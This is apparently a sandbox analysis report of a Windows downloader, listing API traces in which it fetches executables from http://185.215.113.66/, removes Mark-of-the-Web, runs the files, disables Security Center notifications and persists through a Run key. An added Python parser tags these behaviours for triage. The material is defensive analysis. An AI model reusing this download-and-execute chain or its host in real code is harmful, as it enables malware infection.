                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/1), ref: 00B510BF
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/2), ref: 00B510CA
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/3), ref: 00B510D5
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/4), ref: 00B510E0
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/5), ref: 00B510EB
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/6), ref: 00B510F6
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/_1), ref: 00B51101
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/_2), ref: 00B5110C
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/_3), ref: 00B51117
                                                                                Strings
                                                                                • http://185.215.113.66/6, xrefs: 00B510F1
                                                                                • http://185.215.113.66/_3, xrefs: 00B51112
                                                                                • http://185.215.113.66/1, xrefs: 00B510BA
                                                                                • http://185.215.113.66/2, xrefs: 00B510C5
                                                                                • http://185.215.113.66/4, xrefs: 00B510DB
                                                                                • http://185.215.113.66/_2, xrefs: 00B51107
                                                                                • http://185.215.113.66/_1, xrefs: 00B510FC
                                                                                • http://185.215.113.66/3, xrefs: 00B510D0
                                                                                • http://185.215.113.66/5, xrefs: 00B510E6
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1835628262.0000000000B51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B50000, based on PE: true
                                                                                • Associated: 00000008.00000002.1835614748.0000000000B50000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000008.00000002.1835645127.0000000000B52000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000008.00000002.1835663055.0000000000B54000.00000002.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_b50000_2303012543.jbxd
                                                                                Similarity
                                                                                • API ID: CacheDeleteEntry$EnvironmentExistsExpandFilePathSleepStringswsprintf
                                                                                • String ID: http://185.215.113.66/1$http://185.215.113.66/2$http://185.215.113.66/3$http://185.215.113.66/4$http://185.215.113.66/5$http://185.215.113.66/6$http://185.215.113.66/_1$http://185.215.113.66/_2$http://185.215.113.66/_3
                                                                                • API String ID: 1624407425-19798704
                                                                                • Opcode ID: b26271f0645c514db0bae58711f30a7976a377d147c4b996099ee5c1eafbdad8
                                                                                • Instruction ID: 37d188f7c09cc6828c5a6e84a4435a0274b077dc4f518cfa90589a3da9ee7326
                                                                                • Opcode Fuzzy Hash: b26271f0645c514db0bae58711f30a7976a377d147c4b996099ee5c1eafbdad8
                                                                                • Instruction Fuzzy Hash: 7EF09B71243300EF830227E46C0EB4576949A47B5374800C2FA06A71F1CD94404CDB3E

                                                                                Control-flow Graph (basic blocks with their successor edges; the executed / not-executed colouring of the graph image is not recoverable in text)
                                                                                • Block 5: b51000-b5104b ExpandEnvironmentStringsW, wsprintfW → 7, 8
                                                                                • Block 7: b51053-b5107c → 11, 12
                                                                                • Block 8: b5104d-b5104f → 9
                                                                                • Block 9: b5108d-b51090
                                                                                • Block 11: b5107e-b51084 → 12
                                                                                • Block 12: b5108b → 9
                                                                                APIs
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00B5101A
                                                                                • wsprintfW.USER32 ref: 00B51033
                                                                                • PathFileExistsW.KERNELBASE(?), ref: 00B51043
                                                                                • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000001,00000002,00000000), ref: 00B51069
                                                                                • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 00B51085
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1835628262.0000000000B51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B50000, based on PE: true
                                                                                • Associated: 00000008.00000002.1835614748.0000000000B50000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000008.00000002.1835645127.0000000000B52000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000008.00000002.1835663055.0000000000B54000.00000002.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_b50000_2303012543.jbxd
                                                                                Similarity
                                                                                • API ID: File$ChangeCloseCreateEnvironmentExistsExpandFindNotificationPathStringswsprintf
                                                                                • String ID: %s\ssss3444443.jpg$%userprofile%$@1Wu.Wu$^Iu
                                                                                • API String ID: 2220190937-433313667
                                                                                • Opcode ID: 4b0b788e90ea8ced34f496507453fef4badbdc923284df91f689f97dbfa522d2
                                                                                • Instruction ID: 76e5aeae0703dca043c74648b5a1314f25e14704f7d80edbbc2b2cb62440a1df
                                                                                • Opcode Fuzzy Hash: 4b0b788e90ea8ced34f496507453fef4badbdc923284df91f689f97dbfa522d2
                                                                                • Instruction Fuzzy Hash: 2401D4B454130C6BDB309B209C4AFE67378EB41702F0846D4AB18A20D1DAB05AC9DFA5

                                                                                Callgraph

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 002A1850
                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,?), ref: 002A18E8
                                                                                • GetLastError.KERNEL32 ref: 002A18F4
                                                                                • ExitProcess.KERNEL32 ref: 002A1903
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 002A196D
                                                                                • PathFindFileNameW.SHLWAPI(?), ref: 002A197A
                                                                                • wsprintfW.USER32 ref: 002A1999
                                                                                • DeleteFileW.KERNEL32(?), ref: 002A19A9
                                                                                • wcscmp.MSVCR90 ref: 002A19C2
                                                                                • ExitProcess.KERNEL32 ref: 002A19E1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1846603424.00000000002A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1846589371.00000000002A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000009.00000002.1846619040.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000009.00000002.1846673406.00000000002A6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_2a0000_winploravr.jbxd
                                                                                Similarity
                                                                                • API ID: File$ExitNameProcess$CreateDeleteErrorFindLastModuleMutexPathSleepwcscmpwsprintf
                                                                                • String ID: %s%s$%s:Zone.Identifier$%s\%s$%s\%s$%userprofile%$%windir%$46*$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$L6*$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Service$d6*h6*l6*$http://185.215.113.66/$l6*$winploravr.exe$xouauxuax
                                                                                • API String ID: 1209637258-2999526188
                                                                                • Opcode ID: 74fbb35c8f1cc88c9f7f4b064881e86fd3c70140029f4a5b378742664518f5f7
                                                                                • Instruction ID: 296e946222104e9600998789959d8293a108c6490cddd3c316e42e7cfd631e8f
                                                                                • Opcode Fuzzy Hash: 74fbb35c8f1cc88c9f7f4b064881e86fd3c70140029f4a5b378742664518f5f7
                                                                                • Instruction Fuzzy Hash: D6F132F1A50314ABEB24DB60DC4AFEAB779AB4A714F0045C8B309A6190DFB15B98CF54
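The per-function API and Strings listings above follow one fixed shape (an API name, its module, the recovered arguments and a code reference), and the behaviours an analyst wants from them are spread over several records: the download routine that deletes a %ls:Zone.Identifier stream after writing the file (Mark-of-the-Web removal), the DeleteUrlCacheEntry calls that carry the literal http://185.215.113.66/ URLs, and this record's CreateMutexA / GetLastError / ExitProcess gate together with the Security Center override values and the CurrentVersion\Run path in its String ID list. The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample: a parser for lines in that shape plus a handful of behaviour rules that turn a record into tags and IoCs. The rule names and thresholds are the example's own, and the three SAMPLE_* records are constructed from lines copied off this page.

```python
# Added example (not from the report or the sample): parse Joe Sandbox per-function
# API / Strings listings and apply triage rules to them. Rule names are the example's own.
import re
from urllib.parse import urlsplit

# "• DeleteFileW.KERNELBASE(?), ref: 00DB14E5" or "• rand.MSVCR90 ref: 00DB1379"
API_LINE = re.compile(r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)"
                      r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
# "• %ls:Zone.Identifier, xrefs: 00DB14C9"
STR_LINE = re.compile(r"^\s*•\s*(?P<s>.+?),\s*xrefs:\s*[0-9A-Fa-f]+\s*$")
# "• String ID: a$b$c" (the Similarity block lists strings joined by '$')
STRID_LINE = re.compile(r"^\s*•\s*String ID:\s*(?P<s>.*)$")
URL_RE = re.compile(r"https?://[^\s\"'<>),]+")
SECURITY_CENTER_VALUES = {"AntiVirusOverride", "AntiVirusDisableNotify", "AntiSpywareOverride",
                          "FirewallOverride", "FirewallDisableNotify",
                          "UpdatesOverride", "UpdatesDisableNotify"}


def parse_record(text):
    """Split one function record into its API calls (in trace order) and its strings."""
    calls, strings = [], []
    for line in text.splitlines():
        if m := API_LINE.match(line):
            calls.append({"api": m.group("api"), "module": m.group("module"),
                          "raw": m.group("args") or "", "ref": int(m.group("ref"), 16)})
        elif m := STR_LINE.match(line):
            strings.append(m.group("s"))
        elif m := STRID_LINE.match(line):
            strings.extend(s for s in m.group("s").split("$") if s)
    return calls, strings


def _in_order(apis, prefixes):
    """True when calls whose names start with the given prefixes occur in that order."""
    it = iter(apis)
    return all(any(a.startswith(p) for a in it) for p in prefixes)


def analyse(text):
    """Return (sorted behaviour tags, IoC dict) for one function record."""
    calls, strings = parse_record(text)
    apis = [c["api"] for c in calls]
    tags, urls, regvals = set(), set(), set()

    # Mark-of-the-Web removal: DeleteFileW on a <file>:Zone.Identifier alternate data stream.
    if "DeleteFileW" in apis and any(s.endswith(":Zone.Identifier") for s in strings):
        tags.add("motw_strip")
    # Drop name built from %temp% and two rand() values -> <temp>\<n><n>.exe
    if "%temp%" in strings and any("%d%d.exe" in s for s in strings) and "rand" in apis:
        tags.add("random_temp_exe")
    # Network IoCs: literal URLs handed to wininet/urlmon, or referenced as strings.
    for c in calls:
        if c["api"].startswith(("DeleteUrlCacheEntry", "URLDownloadToFile", "InternetOpenUrl")):
            urls.update(URL_RE.findall(c["raw"]))
    for s in strings:
        urls.update(URL_RE.findall(s))
    # Security Center override value names next to the Security Center key path.
    hit = SECURITY_CENTER_VALUES & set(strings)
    if hit and any("Security Center" in s for s in strings):
        tags.add("security_center_override")
        regvals.update(hit)
    # Autostart via ...\CurrentVersion\Run
    if any(s.rstrip("\\").lower().endswith(r"currentversion\run") for s in strings):
        tags.add("run_key_persistence")
    # Single-instance gate: CreateMutex -> GetLastError -> ExitProcess, in that order.
    if _in_order(apis, ("CreateMutex", "GetLastError", "ExitProcess")):
        tags.add("mutex_gate")

    hosts = {urlsplit(u).hostname for u in urls}
    return sorted(tags), {"url": sorted(urls), "host": sorted(h for h in hosts if h),
                          "registry_value": sorted(regvals)}


# Constructed samples: lines copied from the function records in this report.
SAMPLE_DOWNLOADER = r"""
• ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000208), ref: 00DB1350
• rand.MSVCR90 ref: 00DB1379
• wsprintfW.USER32 ref: 00DB13B4
• InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00DB13F9
• CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00DB1428
• DeleteFileW.KERNELBASE(?), ref: 00DB14E5
• URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 00DB1601
Strings
• %ls:Zone.Identifier, xrefs: 00DB14C9
• %temp%, xrefs: 00DB134B
• %s\%d%d.exe, xrefs: 00DB13A8
"""
SAMPLE_CACHE = r"""
• Sleep.KERNELBASE(000007D0), ref: 00B510A8
  • Part of subcall function 00B51000: PathFileExistsW.KERNELBASE(?), ref: 00B51043
• DeleteUrlCacheEntry.WININET(http://185.215.113.66/1), ref: 00B510BF
• DeleteUrlCacheEntry.WININET(http://185.215.113.66/2), ref: 00B510CA
• DeleteUrlCacheEntry.WININET(http://185.215.113.66/3), ref: 00B510D5
• DeleteUrlCacheEntry.WININET(http://185.215.113.66/4), ref: 00B510E0
• DeleteUrlCacheEntry.WININET(http://185.215.113.66/5), ref: 00B510EB
• DeleteUrlCacheEntry.WININET(http://185.215.113.66/6), ref: 00B510F6
• DeleteUrlCacheEntry.WININET(http://185.215.113.66/_1), ref: 00B51101
• DeleteUrlCacheEntry.WININET(http://185.215.113.66/_2), ref: 00B5110C
• DeleteUrlCacheEntry.WININET(http://185.215.113.66/_3), ref: 00B51117
"""
SAMPLE_MUTEX = r"""
• CreateMutexA.KERNELBASE(00000000,00000000,?), ref: 002A18E8
• GetLastError.KERNEL32 ref: 002A18F4
• ExitProcess.KERNEL32 ref: 002A1903
• DeleteFileW.KERNEL32(?), ref: 002A19A9
• String ID: %s:Zone.Identifier$%userprofile%$AntiVirusOverride$FirewallDisableNotify$SOFTWARE\Microsoft\Security Center$Software\Microsoft\Windows\CurrentVersion\Run\$Windows Service$http://185.215.113.66/$winploravr.exe
"""

if __name__ == "__main__":
    for name, record in [("downloader", SAMPLE_DOWNLOADER), ("cache", SAMPLE_CACHE),
                         ("mutex", SAMPLE_MUTEX)]:
        print(name, *analyse(record))
```

The rules are deliberately narrow: "motw_strip" requires both the DeleteFileW call and a ":Zone.Identifier" string in the same record, because a DeleteFileW alone is ordinary cleanup (this record deletes "%s:Zone.Identifier" as well, so it is tagged too); the mutex rule checks call order rather than mere presence, since CreateMutex followed by ExitProcess on ERROR_ALREADY_EXISTS is the single-instance check the report's "may stop execution after checking mutex" signature refers to.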

                                                                                Control-flow Graph (basic blocks with their successor edges; the executed / not-executed colouring of the graph image is not recoverable in text)
                                                                                • Block 112: 2a1100-2a1132 CryptImportKey → 113, 114
                                                                                • Block 113: 2a1138-2a1158 CreateFileW → 115, 116
                                                                                • Block 114: 2a1316-2a131c
                                                                                • Block 115: 2a115e-2a1171 GetFileSize → 117, 118
                                                                                • Block 116: 2a130c-2a1310 CryptDestroyKey → 114
                                                                                • Block 117: 2a1302-2a1306 CloseHandle → 116
                                                                                • Block 118: 2a1177-2a1192 CreateFileMappingA → 119, 120
                                                                                • Block 119: 2a1198-2a11b1 MapViewOfFile → 122, 123
                                                                                • Block 120: 2a12de-2a12e4 → 117, 121
                                                                                • Block 121: 2a12e6-2a12fc SetFilePointer, SetEndOfFile → 117
                                                                                • Block 122: 2a11b7-2a11c0 → 124, 125
                                                                                • Block 123: 2a12d4-2a12d8 CloseHandle → 120
                                                                                • Block 124: 2a12ca-2a12ce UnmapViewOfFile → 123
                                                                                • Block 125: 2a11c6-2a11cd → 124, 126
                                                                                • Block 126: 2a11d3-2a11dc → 124, 127
                                                                                • Block 127: 2a11e2-2a11fe CryptCreateHash → 124, 128
                                                                                • Block 128: 2a1204-2a1241 GetProcessHeap, HeapAlloc → 124, 129
                                                                                • Block 129: 2a1247-2a127c call 2a1020, CryptHashData → 132, 133
                                                                                • Block 132: 2a127e-2a129d CryptVerifySignatureA → 133, 134
                                                                                • Block 133: 2a12b7-2a12c4 GetProcessHeap, HeapFree → 124
                                                                                • Block 134: 2a129f-2a12b4 memcpy → 133
                                                                                APIs
                                                                                • CryptImportKey.ADVAPI32(?,002A31C8,00000214,00000000,00000000,00000000), ref: 002A112A
                                                                                • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000000,00000000), ref: 002A114B
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 002A1164
                                                                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 002A1185
                                                                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 002A11A4
                                                                                • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?), ref: 002A11F6
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002A122D
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 002A1234
                                                                                  • Part of subcall function 002A1020: memcpy.MSVCR90 ref: 002A107F
                                                                                  • Part of subcall function 002A1020: memcpy.MSVCR90 ref: 002A1093
                                                                                  • Part of subcall function 002A1020: CryptImportKey.ADVAPI32(?,00000008,0000001C,00000000,00000000,00000000), ref: 002A10B7
                                                                                  • Part of subcall function 002A1020: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,?,?), ref: 002A10DD
                                                                                  • Part of subcall function 002A1020: CryptDestroyKey.ADVAPI32(00000000), ref: 002A10F0
                                                                                • CryptHashData.ADVAPI32(?,00000000,00000000,00000000), ref: 002A1274
                                                                                • CryptVerifySignatureA.ADVAPI32(?,?,?,00000000,00000000,00000000), ref: 002A1295
                                                                                • memcpy.MSVCR90 ref: 002A12AF
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002A12BD
                                                                                • HeapFree.KERNEL32(00000000), ref: 002A12C4
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 002A12CE
                                                                                • CloseHandle.KERNEL32(00000000), ref: 002A12D8
                                                                                • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000), ref: 002A12F2
                                                                                • SetEndOfFile.KERNEL32(000000FF), ref: 002A12FC
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 002A1306
                                                                                • CryptDestroyKey.ADVAPI32(00000000), ref: 002A1310
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1846603424.00000000002A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 002A0000, based on PE: true
                                                                                 • Associated: 00000009.00000002.1846589371.00000000002A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000009.00000002.1846619040.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000009.00000002.1846673406.00000000002A6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_2a0000_winploravr.jbxd
                                                                                Similarity
                                                                                • API ID: Crypt$File$Heap$Creatememcpy$CloseDestroyHandleHashImportProcessView$AllocDataEncryptFreeMappingPointerSignatureSizeUnmapVerify
                                                                                • String ID: NGS!
                                                                                • API String ID: 1316431928-4070929822
                                                                                • Opcode ID: 026e9932148ead48c09488f74b5cadaf59d98c890036152493b991f45781375c
                                                                                • Instruction ID: f66fa7e3dfa219befde8f840079eb442cf091ae15178157b326f5b9fea254e04
                                                                                • Opcode Fuzzy Hash: 026e9932148ead48c09488f74b5cadaf59d98c890036152493b991f45781375c
                                                                                • Instruction Fuzzy Hash: 62613B75A00219EFDB14CFE4DC4AFAEBBB9BB49700F148548F605B7280DB75AA51CB60

                                                                                 Control-flow Graph

                                                                                 • Basic blocks: 149: 2a1020-2a105c; 150: 2a105e-2a1064; 151: 2a1066; 152: 2a106d-2a10bf (memcpy * 2, CryptImportKey); 153: 2a10c1-2a10f0 (CryptEncrypt, CryptDestroyKey); 154: 2a10f6-2a10fc
                                                                                 • Edges: 149->150, 149->151, 150->152, 151->152, 152->153, 152->154, 153->154
                                                                                APIs
                                                                                • memcpy.MSVCR90 ref: 002A107F
                                                                                • memcpy.MSVCR90 ref: 002A1093
                                                                                • CryptImportKey.ADVAPI32(?,00000008,0000001C,00000000,00000000,00000000), ref: 002A10B7
                                                                                • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,?,?), ref: 002A10DD
                                                                                • CryptDestroyKey.ADVAPI32(00000000), ref: 002A10F0
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1846603424.00000000002A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 002A0000, based on PE: true
                                                                                 • Associated: 00000009.00000002.1846589371.00000000002A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000009.00000002.1846619040.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000009.00000002.1846673406.00000000002A6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_2a0000_winploravr.jbxd
                                                                                Similarity
                                                                                • API ID: Crypt$memcpy$DestroyEncryptImport
                                                                                • String ID:
                                                                                • API String ID: 774555595-0
                                                                                • Opcode ID: 1ef24f869eef4b7dfb0a0d3a08e633a19e5fd87963f76f2aa961d6dd3984ee98
                                                                                • Instruction ID: 22cede6cbe7557abd33e419a427013106f543898051fa9f35dc9221fa4aa558b
                                                                                • Opcode Fuzzy Hash: 1ef24f869eef4b7dfb0a0d3a08e633a19e5fd87963f76f2aa961d6dd3984ee98
                                                                                • Instruction Fuzzy Hash: 543138B1D10249EFDB00CFE8C845BEEBBB4AF4D310F008159EA05B7280DB759A54CBA5

                                                                                 Control-flow Graph

                                                                                 • Basic blocks: 155: 2a1740-2a177c (memset, GetLocaleInfoA, strcmp); 156: 2a177e-2a1780; 157: 2a1782; 158: 2a1784-2a1787
                                                                                 • Edges: 155->156, 155->157, 156->158, 157->158
                                                                                APIs
                                                                                • memset.MSVCR90 ref: 002A174E
                                                                                • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A), ref: 002A1763
                                                                                • strcmp.MSVCR90 ref: 002A1772
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1846603424.00000000002A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 002A0000, based on PE: true
                                                                                 • Associated: 00000009.00000002.1846589371.00000000002A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000009.00000002.1846619040.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000009.00000002.1846673406.00000000002A6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_2a0000_winploravr.jbxd
                                                                                Similarity
                                                                                • API ID: InfoLocalememsetstrcmp
                                                                                • String ID: UKR
                                                                                • API String ID: 3255129521-64918367
                                                                                • Opcode ID: 353606852dfe747a7c70056c88ef22ad2b0ea14e60d4f55027bb1e61c9fde1b1
                                                                                • Instruction ID: a308b455ed623421198001be98923305b233d328156d793f07b621c1a021e613
                                                                                • Opcode Fuzzy Hash: 353606852dfe747a7c70056c88ef22ad2b0ea14e60d4f55027bb1e61c9fde1b1
                                                                                • Instruction Fuzzy Hash: 53E09276E6430877DA00A6A09C07FAA73285713B11F000150BA04560C1FEA1673886D2

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 002A1329
                                                                                • srand.MSVCR90 ref: 002A1330
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000208), ref: 002A1350
                                                                                • strlen.MSVCR90 ref: 002A135A
                                                                                • mbstowcs.MSVCR90 ref: 002A1371
                                                                                • rand.MSVCR90 ref: 002A1379
                                                                                • rand.MSVCR90 ref: 002A138D
                                                                                • wsprintfW.USER32 ref: 002A13B4
                                                                                • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 002A13CA
                                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 002A13F9
                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 002A1428
                                                                                • memset.MSVCR90 ref: 002A144F
                                                                                • InternetReadFile.WININET(00000000,?,00000207,?), ref: 002A1471
                                                                                • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 002A14A2
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 002A14B1
                                                                                • Sleep.KERNEL32(000003E8), ref: 002A14BC
                                                                                • wsprintfW.USER32 ref: 002A14D5
                                                                                • DeleteFileW.KERNEL32(?), ref: 002A14E5
                                                                                • Sleep.KERNEL32(000003E8), ref: 002A14F0
                                                                                • Sleep.KERNEL32(000003E8), ref: 002A1511
                                                                                • DeleteFileW.KERNEL32(?), ref: 002A153E
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 002A154B
                                                                                • InternetCloseHandle.WININET(00000000), ref: 002A1558
                                                                                • InternetCloseHandle.WININET(00000000), ref: 002A1565
                                                                                • Sleep.KERNEL32(000003E8), ref: 002A1570
                                                                                • rand.MSVCR90 ref: 002A1585
                                                                                • Sleep.KERNEL32 ref: 002A159C
                                                                                • rand.MSVCR90 ref: 002A15A2
                                                                                • rand.MSVCR90 ref: 002A15B6
                                                                                • wsprintfW.USER32 ref: 002A15D7
                                                                                • DeleteUrlCacheEntryW.WININET(?), ref: 002A15E7
                                                                                • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 002A1601
                                                                                • wsprintfW.USER32 ref: 002A161D
                                                                                • DeleteFileW.KERNEL32(?), ref: 002A162D
                                                                                • Sleep.KERNEL32(000003E8), ref: 002A1638
                                                                                • Sleep.KERNEL32(000003E8), ref: 002A1659
                                                                                • DeleteFileW.KERNEL32(?), ref: 002A1677
                                                                                Strings
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, xrefs: 002A13C5
                                                                                • %s\%d%d.exe, xrefs: 002A13A8
                                                                                • %ls:Zone.Identifier, xrefs: 002A14C9
                                                                                • %temp%, xrefs: 002A134B
                                                                                • %ls:Zone.Identifier, xrefs: 002A1611
                                                                                • %s\%d%d.exe, xrefs: 002A15CB
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1846603424.00000000002A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 002A0000, based on PE: true
                                                                                 • Associated: 00000009.00000002.1846589371.00000000002A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000009.00000002.1846619040.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000009.00000002.1846673406.00000000002A6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_2a0000_winploravr.jbxd
                                                                                Similarity
                                                                                • API ID: File$Sleep$DeleteInternetrand$CloseHandlewsprintf$Open$CacheCountCreateDownloadEntryEnvironmentExpandReadStringsTickWritembstowcsmemsetsrandstrlen
                                                                                • String ID: %ls:Zone.Identifier$%ls:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                                • API String ID: 789862300-1471993759
                                                                                • Opcode ID: 7d05e475dce258b49ca6c0cd919414dd10db237fc49807f663e7fc01f28aef13
                                                                                • Instruction ID: f14b94b1027457e26a101ffc23f073e0591c59580323e0f8cfa20e1de0a05ead
                                                                                • Opcode Fuzzy Hash: 7d05e475dce258b49ca6c0cd919414dd10db237fc49807f663e7fc01f28aef13
                                                                                • Instruction Fuzzy Hash: BD81D7B5D10314ABD720DB64EC4EFE97379AB8A700F048498F70A921C1DEB59BA4CF61

                                                                                 Control-flow Graph

                                                                                 • Basic blocks: 135: 2a1690-2a16f0 (memset * 2, CreateProcessW); 136: 2a16f2-2a16ff (Sleep); 137: 2a1701-2a1725 (ShellExecuteW); 138: 2a1738-2a173b; 139: 2a1736; 140: 2a1727-2a1734 (Sleep)
                                                                                 • Edges: 135->136, 135->137, 136->138, 137->139, 137->140, 139->138, 140->138
                                                                                APIs
                                                                                • memset.MSVCR90 ref: 002A169E
                                                                                • memset.MSVCR90 ref: 002A16AE
                                                                                • CreateProcessW.KERNEL32(00000000,002A166B,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 002A16E7
                                                                                • Sleep.KERNEL32(000003E8), ref: 002A16F7
                                                                                • ShellExecuteW.SHELL32(00000000,open,002A166B,00000000,00000000,00000000), ref: 002A1712
                                                                                • Sleep.KERNEL32(000003E8), ref: 002A172C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1846603424.00000000002A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 002A0000, based on PE: true
                                                                                 • Associated: 00000009.00000002.1846589371.00000000002A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000009.00000002.1846619040.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000009.00000002.1846673406.00000000002A6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_2a0000_winploravr.jbxd
                                                                                Similarity
                                                                                • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                • String ID: $D$open
                                                                                • API String ID: 3787208655-2182757814
                                                                                • Opcode ID: 16483613048dec63692fb9cc685c317d4729d4579adc52139a4ba64559844fb6
                                                                                • Instruction ID: 45ecbecd0f3fd9295d8ade28c10d56813c75756ecbeadf73979afcdc8716a544
                                                                                • Opcode Fuzzy Hash: 16483613048dec63692fb9cc685c317d4729d4579adc52139a4ba64559844fb6
